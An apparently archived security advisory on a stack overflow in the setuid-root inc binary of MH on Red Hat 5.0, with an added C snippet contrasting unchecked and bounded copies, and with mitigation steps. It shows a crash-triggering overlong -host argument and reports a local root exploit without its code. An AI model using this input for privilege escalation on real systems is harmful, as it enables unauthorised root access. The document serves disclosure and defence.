COMMAND

    mh

SYSTEMS AFFECTED

    Linux RedHat 5.0

PROBLEM

    Cesar Tascon Alvarez found the following.  Due to a lack of security
    checks in the setuid-root  inc binary there is a standard stack
    smashing problem.  A local user can execute code as root.  Let's see:

        [tascon@archivald]$ id
        uid=500(tascon) gid=500(tascon) groups=500(tascon),100(users)
        [tascon@archivald]$ cat /etc/redhat-release
        release 5.0 (Hurricane)
        [tascon@archivald]$ ls -l /usr/bin/mh/inc
        -rwsr-sr-x   1 root     mail        82972 Oct 15 18:06 /usr/bin/mh/inc
        [tascon@archivald]$ /usr/bin/mh/inc
        inc: no mail to incorporate
        [tascon@archivald]$ /usr/bin/mh/inc -host XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]
        XXXXX      <---- (2000 X's here)
        Segmentation fault
        ^^^^^^^^^^^^^^^^^^   Dangerous isn't it?

    A local exploit  exists for  that option.   Note that  MH isn't even
    configured; it is as the installation of RedHat 5.0 left it.  Note
    also that MH is installed by default with RedHat 5.0.
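    The bug class behind the segfault above, shown as an added example
    (not MH's code and not from the advisory): a fixed stack buffer
    filled from a command-line argument with no length check, next to a
    bounded form that rejects the 2000-byte value instead of overflowing.
    HOSTLEN and the function names are assumptions; the real inc(1)
    buffer layout is not given on the page.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Assumed buffer size for the illustration; inc's real size is unknown. */
#define HOSTLEN 64

/* The pattern the advisory describes: no bound on the argument, so a
 * value longer than the buffer writes past it on the stack.  Kept only
 * for contrast; never fed an untrusted or long value here. */
static void set_host_unchecked(char *host, const char *arg)
{
    strcpy(host, arg);
}

/* Hardened form: refuse anything that does not fit (leaving room for the
 * terminating NUL), copy with an explicit bound, and always terminate.
 * Returns 0 on success, -1 when the argument is empty or too long. */
int set_host_checked(char *host, size_t cap, const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= cap)
        return -1;
    memcpy(host, arg, n);
    host[n] = '\0';
    return 0;
}

/* Constructed input mirroring the session above: `count` repeated 'X's.
 * The caller frees the result. */
char *make_xs(size_t count)
{
    char *s = malloc(count + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'X', count);
    s[count] = '\0';
    return s;
}

int main(void)
{
    char host[HOSTLEN];
    char *xs = make_xs(2000);
    if (set_host_checked(host, sizeof host, "pop.example.org") == 0)
        printf("accepted host: %s\n", host);
    if (xs != NULL && set_host_checked(host, sizeof host, xs) != 0)
        printf("rejected %zu-byte host argument\n", strlen(xs));
    set_host_unchecked(host, "ok");   /* harmless with a short value */
    free(xs);
    return 0;
}
```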

    Catalin Mitrofan posted an exploit for Linux mh version 6.8.4-5:

        host (user):~>. .mh_profile
        bash#


SOLUTION

    Uninstall this package  or remove the  suid bit until you  install
    the patch.  Another solution might be to recompile MH without POP
    support,  however  that  is  just  a band-aid solution and doesn't
    really fix the problem with  RedHat's libc.  Remove the suid bit
    from inc.  inc only needs to be setuid for RPOP, a non-standard POP
    authentication  method  which  uses rlogin/rsh-like authentication
    via ruserok().  You can still do POP with either username/password
    or APOP authentication with a  non-setuid inc -- you just  have to
    type your password each time.  The fix can be obtained from:

        ftp.redhat.com

    It appears that  the Debian mh_6.8.4-17  *is* vulnerable, but  not
    with Catalin's exploit (it would probably work with some hacking).